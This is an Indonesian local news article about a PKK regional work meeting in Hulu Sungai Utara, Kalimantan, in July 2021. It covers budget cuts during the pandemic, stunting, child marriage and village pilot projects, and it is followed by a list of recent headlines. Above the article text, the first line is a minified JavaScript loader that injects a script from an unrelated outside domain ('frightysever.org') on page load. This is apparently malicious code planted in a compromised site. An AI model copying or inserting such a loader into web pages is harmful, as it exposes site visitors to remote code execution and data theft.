(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Rakerda PKK Kabupaten HSU, Ketua TP PKK: Bekerja Bersinergi saat Pandemi dengan Keterbatasan Anggaran


KANALKALIMANTAN.COM, AMUNTAI – Ketua Tim Penggerak PKK Kabupaten Hulu Sungai Utara (HSU) Hj Anisah Rasyidah menilai pentingnya Pokja TP PKK bersinergi dengan pemerintah daerah menghadapi pandemi Covid-19, meski dalam anggaran tak terkecuali TP PKK ikut terkena imbas pandemi.

Hal ini disampaikan Anisah saat Rapat Kerja Daerah (Rakerda) bersama pengurus TP PKK Kabupaten, Pokja serta para ketua dan pengurus TP PKK Kecamatan program kerja 2021-2024, di Aula Sekretariat PKK HSU, Selasa (6/7/2021)

“Di tengah Pandemi Covid-19 tidak terkecuali anggaran PKK juga turut dipangkas, maka saya minta semua Pokja bisa bersinergi dan meningkatkan kerja sama dengan para mitra PKK,” kata Ketua PKK HSU Hj Anisah Rasyidah.

Dalam Rakerda ini, Anisah menyebut PKK juga mempunyai mitra kerja di pemerintahan dan swasta yang bisa menjalin kerja sama kala keterbatasan anggaran di tengah pandemi Covid-19.

 

 

Misalnya, pada kegiatan Pokja III memfasilitasi Lomba Menu B2SA dan serba ikan yang dilaksanakan Dinas Ketahanan Pangan atau memfasilitasi lomba serupa.

Baca juga: Banjarbaru Sempat Jadi Penyumbang Terbanyak Kasus Covid-19 di Kalsel, Ini Angka Rabu 7 Juli 2021

Anisah berharap rapat kerja di tingkat desa bisa mengadaptasi hasil Raperda di tingkat kabupaten, disesuaikan dengan kondisi, potensi dan permasalahan di desa masing-masing.

“Misalnya untuk menetapkan proyek percontohan atau pilot project yang dilaksanakan Pokja IV, tiap desa bisa menetapkannya sesuai permasalahan yang dihadapi,” imbuhnya.

Pada Rakerda ini, dipaparkan program kerja dan kegiatan, serta prioritas yang akan dilaksanakan oleh Sekretariat PKK Kabupaten dan empat Pokja yang ada.

Termasuk penyampaian program dan kegiatan kerja masing-masing Pokja, diantaranya program unggulan dari Pokja IV yakni Gerakan Keluarga PKK Gagah Bencana.

“Melalui kegiatan ini akan ditetapkan sembilan proyek percontohan, seperti Gagah Bencana Peduli Stunting,” sebut Anisah.

Akan tetapi, kata Anisah, tidak semua desa menghadapi masalah stunting, jadi tiap desa bisa menyiapkan proyek percontohan lain seperti Gagah Bencana PHBS, Gagah Bencana Sistem Kebakaran dan lainnya.

Baca juga: Sinergi Diskominfo-Polda Kalsel-ULM Tingkatkan Cyber Security

Sedangkan pada Pokja II fokus memperkuat layanan dasar dengan gerakan gemar membaca, sosialisasi wajib belajar sembilan tahun, memfasilitasi kapasitas tutor paket A,B,C dan PAUD serta ketahanan ekonomi melalui pengembangan UP2K dan usaha mikro.

Lebih jauh, Anisah juga mengingatkan permasalahan stunting dan pernikahan anak masih menjadi fokus PKK untuk turut berperan mengatasinya, khususnya melalui Pokja I.

Pada program karakter keluarga diprioritaskan kegiatan diantaranya pencegahan perkawinan anak, bimbingan pra nikah dan pola asuh 1000 hari kehidupan.

Sementara pada kegiatan revolusi mental disusun rencana kegiatan pencegahan perkawinan anak dan mengoptimalkan peran orangtua dalam menerapkan pola asuh anak dan remaja dalam keluarga

Disamping itu, Anisah bersyukur, Desa Pematang Benteng, Kecamatan Sungai Tabukan akan mewakili Kalsel pada lomba desa ke tingkat regional Kaimantan.

Ia berharap berbagai kekurangan yang masih terdapat di desa tersebut, khususnya masalah sanitasi lingkungan, keberadaan jamban di sungai bisa segera diatasi pemerintah kecamatan dan desa.

“Ini bukan main-main, kita mewakili Kalsel, sehingga harus ditindaklanjuti sesuai petunjuk TP PKK Kalsel saat mengunjungi Desa Pematang Benteng,” pungkas Anisah.(kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Al Ghifari

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

8 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

10 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

10 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

10 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

12 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

13 jam ago

This website uses cookies.